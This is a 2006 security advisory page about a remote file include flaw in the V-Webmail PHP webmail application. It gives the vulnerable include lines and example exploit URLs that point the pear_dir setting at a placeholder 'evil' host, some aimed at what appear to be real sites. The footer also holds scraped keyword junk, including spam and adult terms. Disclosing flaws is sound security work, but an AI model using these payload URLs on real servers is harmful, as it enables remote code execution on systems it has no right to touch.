about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability




2006-05-25 V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability 
Rated as : Moderate Risk

Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with
an
abundance of features, including many innovative ideas for web
applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] .
'*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil
securitydot.net - 2006-05-25

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 05:38:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.m9mm.c CMS is Fre www.qtq009 Www.Sex 50 xpl/exploi www.xibaob CMS is Fre GET /u www.qtq009 b&amp; www.jiubao maiayam www.xvideo news for c m...ion=co CMS is Fre www+teenpo 2045 Paris Hilt www.bbcont sickflash. joygov.com kamapisach news for c kamapisach www.taokez CMS is Fre www.bbcont WWW SEX CO www.qvod99 XXXKIM blueflims CMS is Fre hot sex bu www.so-w.c www.bjlzf. win_setup downlod ar bbs.klba8. ly-169.com CMS is F.. sssddd gotonesoft global ann x-zhang.co mambo+Remo hot sxy gotonesoft sign in www.dgvv.c